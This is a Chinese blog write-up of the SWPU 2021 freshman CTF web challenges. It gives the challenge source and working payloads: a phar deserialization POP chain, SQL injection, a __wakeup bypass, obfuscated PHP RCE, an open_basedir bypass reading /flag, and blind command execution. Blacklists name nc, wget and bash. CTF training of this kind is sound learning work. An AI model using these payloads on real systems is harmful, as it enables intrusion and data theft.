技术博客
首页 所有文章 标签 分类 关于
技术博客

目录

SWPU-2021-新生赛

 收录于 The Flag Capture
   约 1106 字   预计阅读 3 分钟 
https://bing.ee123.net/img/rand?artid=146267654

SWPU 2021 新生赛

babyunser

phar反序列化

利用文件查看器直接读到三个文件 read.php php include(‘class.php’); $a=new aa(); ? error_reporting(0); $filename=$_POST[‘file’]; if(!isset($filename)){ die(); } $file=new zz($filename); $contents=$file->getFile(); ?>

“.$contents;?> class.php php class aa{ public $name; public function __construct(){ $this-name=‘aa’; } public function __destruct(){ $this->name=strtolower($this->name); } } class ff{ private $content; public $func; public function __construct(){ $this->content="\php @eval($_POST[1]);?”; } public function __get($key){ $this->$key->{$this->func}($_POST[‘cmd’]); } } class zz{ public $filename; public $content=‘surprise’; public function __construct($filename){ $this->filename=$filename; } public function filter(){ if(preg_match(’/^/|php:|data|zip|//i’,$this->filename)){ die(‘这不合理’); } } public function write($var){ $filename=$this->filename; $lt=$this->filename->$var; //此功能废弃,不想写了 } public function getFile(){ $this->filter(); $contents=file_get_contents($this->filename); if(!empty($contents)){ return $contents; }else{ die(“404 not found”); } } public function __toString(){ $this->{$_POST[‘method’]}($_POST[‘var’]); return $this->content; } } class xx{ public $name; public $arg; public function __construct(){ $this->name=‘eval’; $this->arg=‘phpinfo();’; } public function __call($name,$arg){ $name($arg[0]); } } upload,php php if(isset($_POST[‘submit’])){ $upload_path=“upload/".md5(time()).".txt”; $temp_file = $_FILES[‘upload_file’][’tmp_name’]; if (move_uploaded_file($temp_file, $upload_path)) { echo “文件路径:”.$upload_path; } else { $msg = ‘上传失败’; } } 因为上传的文件会直接被改名且成为txt文件,所以不考虑文件上传绕过rce pop链条 {aa __strlower} – {zz __toString method=wreite,filename->$var} –> {ff __get,$key=$content=xx ,func=assert,} –> {xx __call, $name=assert,$arg=$_POST} 其中 (解析 phar:// 伪协议时,会将其内容进行反序列化,所以 phar 里面的内容传入恶意 pop 链) file=phar://…&method=write&var=content&cmd=system(‘cat /flag’); exp php class aa{ public $name; function __construct(){ $this-name = new zz(); } } class zz{ public $filename; public $content=‘surprise’; function __construct(){ $this->filename = new ff(); } } class ff{ private $content; public $func = “assert”; function __construct(){ $this->content = new xx(); } } class xx{ public $name; public $arg; } $a = new aa(); echo urlencode(serialize($a));

下面这部分就没改

$phar = new Phar(“phar.phar”); $phar->startBuffering(); $phar->setStub(“php __HALT_COMPILER(); ?”); //设置stub $phar->setMetadata($a); //将自定义的meta-data存入manifest $phar->addFromString(“test.txt”, “test”); //添加要压缩的文件 //签名自动计算 ==> POST read.php file=phar://upload/f17682891b083ec486fe811956039270.txt&method=write&var=content&cmd=system(‘cat /flag’);

easy_md5

数组绕过

if ($name != $password && md5($name) == md5($password)){ echo $flag; } 数组绕过 name[]=1 password[]=2

easy_sql

/?wllm=-1’ union select 1,2,3–+ /?wllm=-1’ union select 1,2,database()–+ /?wllm=-1’ union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema=database())–+ /?wllm=-1’ union select 1,2,(select group_concat(column_name)from information_schema.columns where table_name=‘test_tb’)–+ /?wllm=-1’ union select 1,2,(select group_concat(flag)from test_tb)–+

no_wakeup

wake up 绕过 class HaHaHa{ public $admin; public $passwd; public function __construct(){ $this->admin =“user”; $this->passwd = “123456”; } public function __wakeup(){ $this->passwd = sha1($this->passwd); } public function __destruct(){ if($this->admin === “admin” && $this->passwd === “wllm”){ include(“flag.php”); echo $flag; }else{ echo $this->passwd; echo “No wake up”; } } } $Letmeseesee = $_GET[‘p’]; unserialize($Letmeseesee); O:6:“HaHaHa”:2:{s:5:“admin”;s:5:“admin”;s:6:“passwd”;s:4:“wllm”;} Change to O:6:“HaHaHa”:3:{s:5:“admin”;s:5:“admin”;s:6:“passwd”;s:4:“wllm”;}

error

报错注入 ?id=1’ and updatexml(1,concat(0x7e,(select database()),0x7e),1) –+ ?id=1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)–+ ?id=1’ and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=‘test_tb’ limit 1,1),0x7e),1)–+ 这里涉及到flag显示一半的问题 ?id=1’ and updatexml(1,concat(0x7e,(select flag from test_tb),0x7e),1)–+ ?id=1’ and updatexml(1,concat(0x7e,(select right(flag,30) from test_tb),0x7e),1)–+

hardrce

取反绕过 rce

if(isset($_GET[‘wllm’])) { $wllm = $_GET[‘wllm’]; $blacklist = [’ ‘,’\t’,’\r’,’\n’,’+’,’[’,’^’,’]’,’"’,’-’,’$’,’’,’?’,’<’,’>’,’=’,’`’,]; foreach ($blacklist as $blackitem) { if (preg_match(’/’ . $blackitem . ‘/m’, $wllm)) { die(“LTLT说不能用这些奇奇怪怪的符号哦!”); }} if(preg_match(’/[a-zA-Z]/is’,$wllm)) { die(“Ra’s Al Ghul说不能用字母哦!”); } echo “NoVic4说:不错哦小伙子,可你能拿到flag吗?”; eval($wllm); } php fwrite(STDOUT,’[+]your function: ‘); $system=str_replace(array("\r\n", “\r”, “\n”), “”, fgets(STDIN)); fwrite(STDOUT,’[+]your command: ‘); $command=str_replace(array("\r\n", “\r”, “\n”), “”, fgets(STDIN)); echo ‘[] (’.urlencode($system).’)(’.urlencode($command).’);’;

hardrce_3

[参考][https://www.cnblogs.com/pursue-security/p/15404150.html]

自增绕过 rce

if(isset($GET[‘wllm’])) { $wllm = $GET[‘wllm’]; $blacklist = [’ ‘,’^’,’~’,’|’]; foreach ($blacklist as $blackitem) { if (preg_match(’/’ . $blackitem . ‘/m’, $wllm)) { die(“小伙子只会异或和取反?不好意思哦LTLT说不能用!!”); }} if(preg_match(’/[a-zA-Z0-9]/is’,$wllm)) { die(“Ra’sAlGhul说用字母数字是没有灵魂的!”); } echo “NoVic4说:不错哦小伙子,可你能拿到flag吗?”; eval($wllm); } //测试发现7.0.12以上版本不可使用 //使用时需要url编码下 $=[];$=@"$";$=$[’!’==’@’];$=$;$=$_;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$.=$;$.=$;$=$_;$++;$++;$++;$++;$.=$;$=$_;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$.=$;$=$_;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$.=$;$=’’;$__=$;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$__++;$.=$;$=$;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$.=$;$=$;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$.=$;$=$;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$__++;$.=$__;$=$$;$($[_]); 固定格式 构造出来的 assert($POST[]); 然后post传入 _=phpinfo(); 禁用了很多函数,但可以使用 file_put_contents _=file_put_contents(‘1.php’," “); 这段代码的目的是尝试绕过服务器的 open_basedir 限制,以读取服务器上的某些文件(如 /flag)。open_basedir 是 PHP 的一个安全设置,用于限制脚本只能访问指定目录内的文件。通过修改 open_basedir 的值并切换目录,代码试图突破这一限制。 php // 获取 open_basedir 的当前值,并输出 print_r(ini_get(‘open_basedir’).’<br’); // 创建一个名为 ’test’ 的目录 mkdir(’test’); // 切换到 ’test’ 目录 chdir(’test’); // 将 open_basedir 设置为 ‘..’,即上一级目录 ini_set(‘open_basedir’,’..’); // 返回上一级目录 chdir(’..’); // 再次返回上一级目录 chdir(’..’); // 再次返回上一级目录 chdir(’..’); // 将 open_basedir 设置为 ‘/’ ini_set(‘open_basedir’,’/’); // 读取并输出 ‘/flag’ 文件的内容 echo file_get_contents(’/flag’); // 输出数字 1 print(1); ?>

no echo rce

无回显 rce

if(isset($_GET[‘url’])) { $url=$_GET[‘url’]; if(preg_match(’/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|-|*|"|>|<|%|$/i’,$url)) { echo “Sorry,you can’t use this.”; } else { echo “Can you see anything?”; exec($url); } /?url=tac /flllll\aaaaaaggggggg | tee 2.txt 然后访问 2.txt 即可 这种当然可以尝试反弹 shell

sql

sql fuzz,简单绕过,数据截取

/?wllm=-1’//union//select//1,2,database()%23 /?wllm=-1’//union//select//1,2,group_concat(table_name)//from//information_schema.tables//where//table_schema//like//database()%23 /?wllm=-1’//union//select//1,2,group_concat(flag)//from//LTLT_flag%23 /?wllm=-1’//union//select//1,2,mid(group_concat(flag),20,40)//from//LTLT_flag%23

更新于 2025-03-14
 Web
返回 | 主页